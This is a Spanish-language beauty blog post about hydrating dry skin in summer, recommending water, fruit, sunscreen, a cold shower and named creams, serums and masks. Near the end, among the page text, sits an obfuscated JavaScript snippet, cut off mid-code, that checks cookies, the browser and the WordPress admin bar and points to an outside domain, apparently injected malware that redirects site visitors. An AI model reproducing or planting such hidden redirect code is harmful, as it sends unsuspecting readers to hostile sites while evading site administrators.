El verano tan bueno y tan cruel con las pieles más secas si no sabes cómo protegerlas. Por eso, en este post te contamos cómo cuidar e hidratar la piel seca en verano para que nada te impida seguir haciendo todos esos planes que tanto te gustan. La playa, la piscina, las terrazas, los viajes… el verano tiene muchos motivos de peso para ganarse la categoría de mejor momento del año. Por eso, en esta época debemos reforzar nuestros cuidados ante el efecto negativo del sol, el aire acondicionado, el cloro, la excesiva sudoración o el salitre, entre otros. ¡Atentas que empezamos!

 

Chica-playa-utilizando-crema-solar

¿El mejor secreto para cuidar de la piel en verano? Hidratación constante 

Las pieles secas necesitan estar hidratadas tanto en invierno como en verano, si bien en esta segunda parte del año debemos aumentar la dosis de hidratación. La pérdida de líquido debido principalmente a las altas temperaturas nos obliga a estar más pendientes de las necesidades de nuestra piel. Y vosotras estaréis pensando que con la de cosas que hay que hacer en verano quién se va a acordar todo el tiempo de la piel, ¿verdad? Para hacerlo por ti existen productos como la Brume Sorbet Énergisante Dior Life que se encarga de aportar la hidratación y energía que la piel necesita al mismo tiempo que prolonga la duración del maquillaje.

Pero eso no es todo, también podemos hidratarnos a través de otras fuentes naturales. Por eso, durante los meses de verano no te olvides de llevar siempre agua y de tomar frutas como la sandía, que tiene muchos antioxidantes o platos sencillos de preparar como el gazpacho. Y por supuesto, utilizar protección solar tanto en la playa o la piscina como en el día a día. En esta época cobran también especial importancia los sérums como el Hydra-Essentiel de Clarins que ataca de forma directa la deshidratación de la piel.

 

dos-chicas-en-la-pla-bebiendo-coctel-de-fruta

La rutina de noche perfecta para una piel más sana en verano

Cae la tarde y después de un día de sol y playa, comida en la calle y atardecer en la piscina toca volver a casa. Es, a partir de este momento, cuando debemos iniciar nuestra rutina de noche para pieles secas en verano. Lo primero es empezar con una buena ducha relajante, recomendamos utilizar (sobre todo al final) agua fría porque al igual que comentábamos en nuestro post Remedios para tratar la raíz grasa y las puntas secas, tiene grandes ventajas.

Con el cuerpo y la piel recién refrescadas es el mejor momento para aplicar la mascarilla en crema Hydra Beauty Masque de Nuit au Camélia de CHANEL que ayuda a la piel a oxigenarse por la noche para lucir como nueva al día siguiente. Complementa este cuidado especial con otros más versátiles como la crema Ideal Hydratation de Crème des Lagons que por su poder de hidratar, nutrir y proteger de agresiones externas, es perfecta tanto para la noche como para el día. Las pieles especialmente secas son las que más agradecerán el torrente de vitaminas y beneficios naturales de la mascarilla Hydra-Flash Formule Intensive de Sisley.

 

Chica-utilizando-algodon-con-crema-sobre-la-cara-para-cuidarse

Estos han sido nuestros consejos para cuidar y prevenir la piel seca en verano. Ahora os toca a vosotras contarnos cuáles son vuestros trucos y experiencias. ¡Os esperamos!

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone